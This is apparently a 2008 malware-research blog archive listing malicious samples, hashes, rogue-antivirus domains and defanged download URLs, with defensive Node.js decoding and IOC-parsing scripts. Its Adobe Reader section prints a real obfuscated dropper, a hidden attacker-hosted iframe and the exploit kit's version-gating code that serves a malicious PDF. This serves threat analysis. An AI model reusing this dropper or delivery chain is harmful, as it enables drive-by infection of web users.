Archive for August, 2008

31 Aug

File Added: MediaTubeCodec_ver1.955.0.exe

Only one file to add to the database today. Maybe later on there will be more. As usual, the URL is still live so proceed at your own risk. This is available in /pnuemo-malware/.

MediaTubeCodec_ver1.955.0.exe
Result: 3/35 (8.58%)
MD5: 1968047e55acf222d7d0a4eaee1a3c40
VirusTotal
ThreatExpert Analysis
hxxp://software-for-me08.com/download/502/955/0/

31 Aug

Adobe Acrobat Reader PDF Exploit (gnu.pdf & us.pdf) (UPDATED)

This morning we found a website that automatically loads a malicious PDF file.

When the user is directed to the site, a hidden iframe loads the PDF. Here’s what happens…

Links still live, proceed at your own risk.

The user visits hxxp://120.50.46.90/~admin/tps/index.php, and the page includes the following obfuscated code:

<script language="javascript">document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%36%39%2E%34%36%2E%32%37%2E%34%31%2F%61%66%78%76%2F%74%70%76%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));</script>

when deobfuscated…

<iframe src="http://69.46.27.41/afxv/tpv/index.php" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
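
Decoding this by hand works for one payload, but the same wrapper turns up on many landing pages. The following Node.js script is an added example (ours, not code from the original post or from the landing page): it pulls every unescape('…') argument out of a script, decodes it the way the browser’s legacy unescape() would (%XX and %uXXXX), and lists the iframes the decoded HTML injects, flagging the ones that are hidden (1x1 pixel, visibility:hidden or display:none). The sample input is the obfuscated script from this post with the line wrapping removed; output URLs are defanged to hxxp, following the page’s own convention.

```javascript
// Added example, not from the original post: static decoding of
// document.write(unescape('...')) droppers and extraction of hidden iframes.

// The obfuscated script as seen on the landing page, line wrapping removed.
const SAMPLE_SCRIPT =
  '<script language="javascript">document.write(unescape(\'%3C%69%66%72' +
  '%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%36%39%2E' +
  '%34%36%2E%32%37%2E%34%31%2F%61%66%78%76%2F%74%70%76%2F%69' +
  '%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68' +
  '%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69' +
  '%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74' +
  '%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66' +
  '%72%61%6D%65%3E\'));</script>';

// Re-implementation of the legacy unescape(): %XX and %uXXXX sequences only,
// so the decoder does not rely on the deprecated global.
function jsUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, u, x) => String.fromCharCode(parseInt(u !== undefined ? u : x, 16)));
}

// Every string literal passed to unescape(...) in the script, decoded.
function decodeUnescapeCalls(script) {
  const out = [];
  const re = /unescape\(\s*(['"])((?:(?!\1).)*)\1\s*\)/g;
  let m;
  while ((m = re.exec(script)) !== null) out.push(jsUnescape(m[2]));
  return out;
}

// Defang a URL for safe display (the page's own hxxp convention).
function defang(url) {
  return url.replace(/^http(s?):\/\//i, 'hxxp$1://');
}

// Read one attribute from an iframe tag's attribute string; handles quoted
// values and bare values such as width=1.
function attr(attrs, name) {
  const re = new RegExp('\\b' + name + '\\s*=\\s*(?:"([^"]*)"|\'([^\']*)\'|([^\\s>]+))', 'i');
  const r = re.exec(attrs);
  if (!r) return null;
  return r[1] !== undefined ? r[1] : (r[2] !== undefined ? r[2] : r[3]);
}

// List the iframes in a decoded HTML fragment and flag the hidden ones
// (1x1 pixel, visibility:hidden or display:none).
function extractIframes(html) {
  const frames = [];
  const tagRe = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const a = m[1];
    const width = parseInt(attr(a, 'width') || '', 10);
    const height = parseInt(attr(a, 'height') || '', 10);
    const style = (attr(a, 'style') || '').toLowerCase();
    const hidden = (width <= 1 && height <= 1) ||
      /visibility\s*:\s*hidden|display\s*:\s*none/.test(style);
    frames.push({ src: defang(attr(a, 'src') || ''), width, height, hidden });
  }
  return frames;
}

// Full pipeline: decode every unescape() payload and collect the iframes.
function findInjectedIframes(script) {
  return decodeUnescapeCalls(script).flatMap(extractIframes);
}

for (const f of findInjectedIframes(SAMPLE_SCRIPT)) {
  console.log(`${f.hidden ? 'HIDDEN' : 'visible'} iframe ${f.width}x${f.height} -> ${f.src}`);
}
```

Because the decoder never evaluates the script, it is safe to run over captured pages; a payload that is built up by string concatenation or a second layer of unescape() would need the decoded output fed back through it.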

The hidden iframe above pulls in a second page, which includes the following plugin-fingerprinting code…

<script>
ppdf=0;
i=0;
// Walk navigator.plugins and pull version numbers out of the plugin descriptions.
for(;navigator.plugins[i];i++)
{
// Matches "Adobe Acrobat Plug-In ... <major>.<minor>" and captures the version.
re=/.d.{2}e.A.{2}o.....l..-.+?([0-9]+.[0-9]+)/;
if(res=re.exec(navigator.plugins[i].description))
{
ppdf=res[1];
}
// Matches "Shockwave Flash <major>.<minor> r<build>".
var re=/.h.{5}v.+?s.\s([0-9])\S([0-9]).+?([0-9]{1,5})/;
var res;
if(res=re.exec(navigator.plugins[i].description))
{
// Collected but not used by the code shown here.
flash=res[1]+'.'+res[2]+'.'+res[3];
}
}
ppdfenable=0;
if(ppdf!=0)
{
ppdfenable=0;
// Strip everything but digits: "7.0" becomes "70".
ppdf=ppdf.replace(/\D/g,"");
// Target Reader 7.0.x ...
if(ppdf[0]==7 && ppdf[1]<1)ppdfenable=1;
// ... and any major version below 7. 7.1 and later are skipped.
if(ppdf[0]<7)ppdfenable=1;if(ppdfenable)
{
document.write('<iframe width=1 height=1 src="hxxp://69.46.27.41/afxv/tpv/gnu.pdf"></iframe>');
}
}
</script>

The script only writes the second iframe when it finds an Adobe Reader plugin at version 7.0.x or below, which leads us to the PDF in question at hxxp://69.46.27.41/afxv/tpv/gnu.pdf. Here is additional information regarding this file. It is also available in /pnuemo-malware/.
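
Reading that version gate by hand is error-prone, so here is an added example (ours, not the kit’s or the post author’s code) that replays the fingerprinting logic offline in Node.js. It uses the kit’s own two regular expressions and version check, applied to constructed navigator.plugins description strings (made up to exercise the regexes, not copied from real browsers), and reports whether a given plugin set would receive the gnu.pdf iframe.

```javascript
// Added example, not from the original post: replay the landing page's
// plugin fingerprint and Adobe Reader version gate offline.

// The kit's own regular expressions, copied from the script above.
// ACROBAT_RE matches "Adobe Acrobat Plug-In ..." and captures "<major>.<minor>";
// FLASH_RE matches "Shockwave Flash <major>.<minor> r<build>".
const ACROBAT_RE = /.d.{2}e.A.{2}o.....l..-.+?([0-9]+.[0-9]+)/;
const FLASH_RE = /.h.{5}v.+?s.\s([0-9])\S([0-9]).+?([0-9]{1,5})/;

// Same decision logic as the kit: strip non-digits from the Reader version and
// enable the exploit for 7.0.x or any major version below 7.
function fingerprint(pluginDescriptions) {
  let ppdf = 0;
  let flash = null;
  for (const desc of pluginDescriptions) {
    let res = ACROBAT_RE.exec(desc);
    if (res) ppdf = res[1];
    res = FLASH_RE.exec(desc);
    if (res) flash = res[1] + '.' + res[2] + '.' + res[3];
  }
  let servePdf = false;
  if (ppdf !== 0) {
    const digits = ppdf.replace(/\D/g, '');              // "7.00" -> "700"
    if (digits[0] == 7 && digits[1] < 1) servePdf = true; // 7.0.x
    if (digits[0] < 7) servePdf = true;                   // anything below 7
    // The kit compares single characters, so it only ever looks at the first
    // two digits: 7.1 is skipped, 7.0.x is served.
  }
  return {
    readerVersion: ppdf === 0 ? null : ppdf,
    flashVersion: flash, // collected by the kit but unused in the snippet shown
    servePdf,
  };
}

// Constructed plugin description strings (made up to exercise the regexes,
// not copied from real browsers) and the verdict the kit's logic gives them.
const CASES = [
  { plugins: ['Adobe Acrobat Plug-In Version 7.00 for Netscape'], expect: true },
  { plugins: ['Adobe Acrobat Plug-In Version 6.00 for Netscape'], expect: true },
  { plugins: ['Adobe Acrobat Plug-In Version 7.10 for Netscape'], expect: false },
  { plugins: ['Shockwave Flash 9.0 r124'], expect: false },
  { plugins: [], expect: false },
];

// Number of cases where the replayed logic disagrees with the expected verdict.
function checkCases() {
  return CASES.filter((c) => fingerprint(c.plugins).servePdf !== c.expect).length;
}

for (const c of CASES) {
  const r = fingerprint(c.plugins);
  console.log(`${JSON.stringify(c.plugins)} -> reader=${r.readerVersion} flash=${r.flashVersion} servePdf=${r.servePdf}`);
}
```

Feeding the real description strings from a browser’s navigator.plugins array into fingerprint() tells you whether that browser would have been served the PDF, which is a quicker triage than opening the page in a sandbox.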

gnu.pdf
Result: 6/35 (17.15%)
MD5: 213d20a0523b6ea6c93d4348a509c34c
VirusTotal

Update your software!

UPDATED 9/1 12p PST

us.pdf
Result: 10/36 (27.78%)
MD5: 8175212481f069a6dd54de9cbd044039
VirusTotal
hxxp://174.133.121.165/us.pdf
hxxp://88.85.95.134/us.pdf

30 Aug

Rogue Software Removal (VIDEO)

This is a special post that shows how to remove some of the rogue anti-malware software that has become an epidemic (Antivirus 2008, XP Antivirus, MS Antivirus, etc.). AV companies try their best to keep up with all the latest incarnations of this rogue software, but in some cases it can take weeks for your AV to detect them. This video shows how you can remove some of them with free utilities. The instructions may not be easy for a novice user, but we tried to make them as simple as possible. This process may not work in EVERY case, but most of the ones we’ve come across can be removed this way. Please be careful when attempting to remove this malware: you do not want to delete the wrong file. Try this at your own risk.

The tools used in this video are Process Explorer and Autoruns, both available for free from Sysinternals.
Process Explorer
Autoruns

[Screenshot: click image for video]
(Click here to download video (.wmv))

30 Aug

New Wista Antivirus 2009 (Not detected)

Today we found a new site distributing the rogue anti-malware software Wista Antivirus 2009. The file downloaded from the website, setup_en.exe (575953F4912EA2B9FF2598D0EE561828), currently shows zero detection at VirusTotal. Clicking “Free Scan” redirects to a fake scan page, and the removal file it offers points to “Spyware Isolator”, which is detected by most AVs.

[Screenshot: Wista Antivirus 2009]

Site: hxxp://wista-antivirus2009.com
File: setup_en.exe 3126445 bytes | spywareisolator_installer.exe 81920 bytes
MDB Path: /lithium-malware/setup_en.zip | /lithium-malware/

Removal:

Remove this threat with MalwareBytes!

30 Aug

Antivirus XP 2008 – Updated Domain List

The IRVL group seems to think that they will go undetected longer by creating a bunch of new domains over the weekend. Pft! They should know by now that we don’t sleep over here. ;)

[Screenshot: Antivirus XP 2008 (avxp08)]

The files currently being distributed have been passed around quite a bit, and I expect the binaries to be changed within the next few days. One of the new domains (hxxp://antivirused.com) already has an updated file (DEFB61DF4D6A187038FC3725EB431FAB) with only a 5/36 detection ratio at VirusTotal.

None of these new domains have the exploit code we talked about here. (at the time of this post)

Site: hxxp://antivirus5.com
File: scan.exe (ACA8B3BF12AF0B652AF5997DB629BDC5)
Info: File size: 203776 bytes [VirusTotal 18/36]
MDB Path: /lithium-malware/scan.zip

Site: hxxp://antivirus6.com
File: scan.exe (ACA8B3BF12AF0B652AF5997DB629BDC5)
Info: File size: 203776 bytes [VirusTotal 18/36]
MDB Path: /lithium-malware/scan.zip

Site: hxxp://antivirused.com
File: scan.exe (DEFB61DF4D6A187038FC3725EB431FAB)
Info: File size: 203776 bytes [VirusTotal 5/36] [ThreatExpert] *new*
MDB Path: /lithium-malware/scan(4).zip

Site: hxxp://antivirusik.com
File: scan.exe (ACA8B3BF12AF0B652AF5997DB629BDC5)
Info: File size: 203776 bytes [VirusTotal 18/36]
MDB Path: /lithium-malware/scan.zip

Site: hxxp://antivirusol.com
File: scan.exe (ACA8B3BF12AF0B652AF5997DB629BDC5)
Info: File size: 203776 bytes [VirusTotal 18/36]
MDB Path: /lithium-malware/scan.zip

Site: hxxp://antivirusrf.com
File: scan.exe (ACA8B3BF12AF0B652AF5997DB629BDC5)
Info: File size: 203776 bytes [VirusTotal 18/36]
MDB Path: /lithium-malware/scan.zip

Site: hxxp://antivirustg.com
File: scan.exe (ACA8B3BF12AF0B652AF5997DB629BDC5)
Info: File size: 203776 bytes [VirusTotal 18/36]
MDB Path: /lithium-malware/scan.zip

Site: hxxp://antivirusuj.com
File: scan.exe (ACA8B3BF12AF0B652AF5997DB629BDC5)
Info: File size: 203776 bytes [VirusTotal 18/36]
MDB Path: /lithium-malware/scan.zip

Site: hxxp://antivirusyh.com
File: scan.exe (ACA8B3BF12AF0B652AF5997DB629BDC5)
Info: File size: 203776 bytes [VirusTotal 18/36]
MDB Path: /lithium-malware/scan.zip
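
The per-site blocks above are easy to read but awkward to act on. The following Node.js script is an added example (ours, not the post’s code): it parses that Site/File/Info/MDB Path block format into one record per binary, grouping the domains that serve each MD5, and carries the file size, the VirusTotal ratio (with or without the space after “VirusTotal”) and the *new* marker along. The input is a constructed sample in the same format, a subset of the list above with one domain deliberately repeated to show that duplicates collapse.

```javascript
// Added example, not from the original post: parse the Site/File/Info/MDB Path
// blocks into one record per binary, grouping domains by MD5.

// Constructed sample in the post's block format (a subset of the list, with
// one domain repeated on purpose).
const SAMPLE_LIST = `
Site: hxxp://antivirus5.com
File: scan.exe (ACA8B3BF12AF0B652AF5997DB629BDC5)
Info: File size: 203776 bytes [VirusTotal18/36]
MDB Path: /lithium-malware/scan.zip

Site: hxxp://antivirused.com
File: scan.exe (DEFB61DF4D6A187038FC3725EB431FAB)
Info: File size: 203776 bytes [VirusTotal 5/36] [ThreatExpert] *new*
MDB Path: /lithium-malware/scan(4).zip

Site: hxxp://antivirusik.com
File: scan.exe (ACA8B3BF12AF0B652AF5997DB629BDC5)
Info: File size: 203776 bytes [VirusTotal18/36]
MDB Path: /lithium-malware/scan.zip

Site: hxxp://antivirusik.com
File: scan.exe (ACA8B3BF12AF0B652AF5997DB629BDC5)
Info: File size: 203776 bytes [VirusTotal18/36]
MDB Path: /lithium-malware/scan.zip
`;

// Split the text on blank lines and read the labelled fields of each block.
function parseBlocks(text) {
  return text.trim().split(/\n\s*\n/).map((block) => {
    const fields = {};
    for (const line of block.split('\n')) {
      const m = /^(Site|File|Info|MDB Path):\s*(.*)$/.exec(line.trim());
      if (m) fields[m[1]] = m[2];
    }
    return fields;
  }).filter((f) => f.Site && f.File);
}

// Turn one block into a flat IOC record.
function toRecord(f) {
  const file = /^(\S+)\s*\(([0-9A-Fa-f]{32})\)/.exec(f.File);
  const size = /File size:\s*(\d+)/.exec(f.Info || '');
  const vt = /\[VirusTotal\s*(\d+)\/(\d+)\]/.exec(f.Info || '');
  return {
    domain: f.Site.replace(/^hxxps?:\/\//i, '').replace(/\/$/, '').toLowerCase(),
    filename: file ? file[1] : null,
    md5: file ? file[2].toLowerCase() : null,
    sizeBytes: size ? parseInt(size[1], 10) : null,
    vtDetected: vt ? parseInt(vt[1], 10) : null,
    vtTotal: vt ? parseInt(vt[2], 10) : null,
    isNew: /\*new\*/.test(f.Info || ''),
    mdbPath: f['MDB Path'] || null,
  };
}

// Group records by MD5 so each distinct binary lists every domain serving it.
// A Set per group collapses repeated domains.
function groupByHash(text) {
  const groups = new Map();
  for (const r of parseBlocks(text).map(toRecord)) {
    if (!r.md5) continue;
    if (!groups.has(r.md5)) {
      groups.set(r.md5, {
        md5: r.md5, filename: r.filename, sizeBytes: r.sizeBytes,
        vtDetected: r.vtDetected, vtTotal: r.vtTotal, isNew: r.isNew,
        mdbPath: r.mdbPath, domains: new Set(),
      });
    }
    groups.get(r.md5).domains.add(r.domain);
  }
  return groups;
}

for (const g of groupByHash(SAMPLE_LIST).values()) {
  console.log(`${g.md5} ${g.filename} ${g.vtDetected}/${g.vtTotal}${g.isNew ? ' *new*' : ''}: ${[...g.domains].join(', ')}`);
}
```

Grouping by hash rather than by domain is what makes a campaign like this one readable: a single binary behind many throwaway domains shows up as one line, and the one domain that already carries a freshly packed sample stands out on its own.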

Removal:

Remove this threat with MalwareBytes!

29 Aug

Database Update (9 Files) Low-Moderate Detection

Here is a fresh round of malware found over the last couple of days. All information about them is listed. They are available in /pnuemo-malware/.

Websites are still live, proceed at your own risk!

us.txt (Rename to .exe to install)
Result: 7/36 (19.45%)
MD5: 2ba4acadfb372ea3a29874afe46cf6d4
VirusTotal
ThreatExpert Analysis
hxxp://lolika.cn/docs/us.txt

us4.txt (Rename to .exe to install)
Result: 5/36 (13.89%)
MD5: 6a732d670ff5b0fc0f5d220f0e8fb332
VirusTotal
ThreatExpert Analysis
hxxp://lolika.cn/docs/us.txt

CalcRFC.exe | CalcImpSAT.exe | CalsRT58.exe
Result: 1/36 (2.78%)
MD5: daef83cdf59d4bf97d2e220c0689cd1b
VirusTotal
ThreatExpert Analysis
hxxp://art.creativity.edu.tw/images/avatar/users/
hxxp://schooldog.com/bbs/skin/sara_bbs/

videporn920ma.exe
Result: 23/36 (63.89%)
MD5: 1e5e45f5fa77546b0628a41fc37176fd
VirusTotal
ThreatExpert Analysis
hxxp://camp.ro/videporn920ma.exe

CleanerInstaller.exe
Result: 16/36 (44.45%)
MD5: d3dfcc09e20af294bce88d5b50996ead
VirusTotal
ThreatExpert Analysis
hxxp://download.secureexpertcleaner.com/CleanerInstaller.exe

TotalSecure2009.exe
Result: 4/35 (11.43%)
MD5: 02a18d7e8dc15a53b8830bdcd68e7fe4
VirusTotal
ThreatExpert Analysis
hxxp://gettotalsec2008.com/TotalSecure2009.exe

setup_110084_3_.exe
Result: 4/35 (11.43%)
MD5: 0b429e47169219edd3a21d7845355ec0
VirusTotal
ThreatExpert Analysis
hxxp://dnld.winsecuritydl.com/load/setup_110084_3_.exe

setup_1_506_.exe
Result: 14/36 (38.89%)
MD5: 852eaacfb096afe7b72fe04cebe3612d
VirusTotal
ThreatExpert Analysis
hxxp://dnld.getwsp.com/load/setup_1_506_.exe

wotcodec.v.1.000.exe
Result: 18/36 (50%)
MD5: 905c85ab50f200dd0229cc93e055ed5a
VirusTotal
ThreatExpert Analysis
hxxp://wotcodec.com/download/wotcodec.v.1.000.exe

29 Aug

Fake PornTube site spreading codec.v.1.0.exe

It’s no surprise that a slew of pornographic websites spread malware. This one is a rip-off of an adult video site that itself imitates the very popular YouTube, complete with fake user comments just like the real thing. The operators are keeping up with the times by spreading new variants with low detection: this one in particular is undetected by every AV except for one heuristic catch. The file is available in /pnuemo-malware/ in our repository.

[Screenshot: fake PornTube page]

codec.v.1.0.exe
Result: 1/36 (2.78%)
MD5: 611430330319db5ce1ff98b6293576f7
VirusTotal
ThreatExpert Analysis

Removal:

Remove this threat with MalwareBytes!

29 Aug

“exclusive discount” for XP Antivirus

Note: This site is advertising Rogue “Fake” Anti-malware software. Do not purchase, download, or install the software!
[Screenshot: xp-protections.com]

Sites:

  • hxxp://xp-protections.com
  • hxxp://xp-registration.com
  • hxxps://xpprotectionsoftware.com

Files:

  • XPantivirus2008_v40002.exe
    • MD5: 3A8181353BE69C8FF862BA589C551DE5
    • VirusTotal Result: 19/35 (54.29%)